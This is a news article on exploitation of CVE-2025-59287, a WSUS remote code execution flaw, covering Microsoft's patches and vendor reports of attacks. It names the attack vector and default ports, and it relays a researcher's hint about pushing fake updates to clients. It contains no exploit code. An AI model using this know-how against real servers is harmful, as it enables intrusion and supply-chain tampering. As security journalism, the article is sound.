Windows Server WSUS bug exploits underway, Microsoft’s mum • The Register

Governments and private security sleuths warned that attackers are already exploiting a critical bug in Microsoft Windows Server Update Services, shortly after Redmond pushed an emergency patch for the remote code execution (RCE) vulnerability.

Plus, there’s at least one proof-of-concept attack floating around in cyberspace, and it only takes one specially crafted request to exploit the bug for full system takeover – so we know what Microsoft admins are doing this weekend. 

The vulnerability, tracked as CVE-2025-59287 and serious enough to receive a 9.8 out of 10 CVSS score, affects Windows Server versions 2012 through 2025. It stems from insecure deserialization of untrusted data and allows unauthenticated attackers to execute arbitrary code on vulnerable systems. And servers without the Windows Server Update Services (WSUS) role enabled aren’t affected.

Microsoft initially issued a fix for CVE-2025-59287 on October 14 – Patch Tuesday – but it didn’t fully patch the security hole, and late Thursday Redmond pushed an emergency update. 

But that second patch might not be foolproof, either. Security researcher Kevin Beaumont said he poked holes in the out-of-band update in the lab, and after achieving remote code execution, “I was able to tamper with the updates offered to the clients and push out malicious updates to said clients … I don’t want to detail too much to prevent ransomware groups going nuts, but you can lift prior research and adapt it easily to add fake updates for clients.”

Later, he added: “For bonus points you can set the deadline date on WSUS for your payload as in the past, and clients will instantly install it. Or set it at, say, 2pm and every client will sit on it until 2pm and then install at the same time.”

On Friday, the US Cybersecurity and Infrastructure Security Agency added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog, and the Dutch National Cybersecurity Center reportedly issued an alert about exploitation activity.

Exploitation of this flaw is indiscriminate. If an unpatched WSUS instance is online, at this stage it has likely already been compromised

Microsoft declined to answer The Register‘s exploitation-related questions, and at the time of publication, the security update for CVE-2025-59287 still listed the bug as not exploited, with no public exploit code in the wild – although we’d assume Redmond will have to update both of these soon.

“We re-released this CVE after identifying that the initial update did not fully mitigate the issue,” a Microsoft spokesperson told The Register. “Customers who have installed the latest updates are already protected.”

Meanwhile, private security firms including Huntress and watchTowr warned attackers had already begun abusing the flaw.

“Starting around 2025-10-23 23:34 UTC, Huntress observed threat actors targeting WSUS instances publicly exposed on their default ports (8530/TCP and 8531/TCP) to exploit a deserialization vulnerability via the AuthorizationCookie (CVE-2025-59287),” Huntress researchers said.

Exploitation activity included using the HTTP worker process and WSUS service binary to run Command Prompt and PowerShell, and then using PowerShell to scan servers for sensitive network and user information, and then transferring this data via a remote webhook.

The attackers used proxy networks for these attacks, which made exploitation more difficult to detect.

It’s worth noting that the threat hunters said they spotted fewer than 25 susceptible hosts, as WSUS is not often exposing ports 8530 and 8531. “We expect exploitation of CVE-2025-59287 to be limited,” the Huntress researchers wrote.

WatchTowr CEO Benjamin Harris, however, had a slightly different take on the likelihood of mass exploitation – and strong words for anyone exposing WSUS to the public internet.

“Exploitation of this flaw is indiscriminate. If an unpatched WSUS instance is online, at this stage it has likely already been compromised,” he told The Register. 

“There really is no legitimate reason in 2025 to have WSUS accessible from the Internet – any organization in that situation likely needs guidance to understand how they ended up in this position,” he added. “We’ve observed exposure in 8,000+ instances, including extremely sensitive, high-value organizations … some of the affected entities are exactly the types of targets attackers prioritize.” ®